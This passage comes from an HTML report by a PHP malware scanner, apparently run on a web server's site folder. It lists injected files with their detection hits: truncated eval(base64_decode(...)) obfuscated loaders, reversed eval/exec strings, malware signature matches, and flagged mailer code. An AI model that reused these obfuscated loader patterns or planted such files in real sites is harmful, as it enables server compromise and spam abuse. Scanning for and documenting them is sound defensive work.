<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_120").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/nxbpu.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 70.78 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:16:39</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:16:39</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_121" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOExMemc3NS9...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5F</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">"; eval(</span><span style="color: #0000BB">$o</span><span style="color: #DD0000">("</span><span style="color: #0000BB">CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$o</span><span style="color: #007700">(</span><span style="color: #DD0000">"CiRzdHQxID0gIlN5MUx6TkZRdDdkVDEwdXZLczFMenM4dEtFb3RMdFpJcjhyTVM4dEpMRWxGWWlVbEZxZVx4NjFtXHg2M1NucFx4NDNceDYybnA2UnFGSlx4NjNVRlx4NjFXV1x4NjFceDYxZ1VsNVFZXHg2MUlLXHg0Mk5RXHg0MVx4M2QiOwokc3R0MCA9ICJiZTRINVB3L3ovL3IvLzc3N3Y5L1c5MzE4bjEvZlovNTkvM3lmVy8vMjlmODUvTjkzODNvZmY4OUd2Ny81enc5aUgxTmZ6ZkdvdHNmS2Z2K3A5dWdpMC9wUDdzLy9MVS82LzN2ZmhmLy9IeWVrblgvWXk3Q0ZmZnFZTjRoTDk1WDRIM25xRGovWDRMNSszLy9NelRYL3o3RzlmTzY5eGZkOXJ2UCtkODN5K052L24vRnZEOWY2cDVEQVAwSzd2Ly9mWS9KUjczUGovL2kvc3YvL1FmZTVMT3k0MXNIOEx...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">laVE</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_121").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ujfsz.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 161.68 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 18:55:02</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 18:55:02</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 285</span><br><table id="file_122" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1063</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1068</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1096</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1157</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">the IMAP extension is available</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">parseAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$addrstr</span><span style="color: #007700">, </span><span style="color: #0000BB">$useimap </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1205</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'imap_rfc822_parse_adrlist'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$isHtml </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1273</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setFrom</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$auto </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the Message</span><span style="color: #007700">-</span><span style="color: #0000BB">ID header of the last email</span><span style="color: #007700">.</span>
</span>
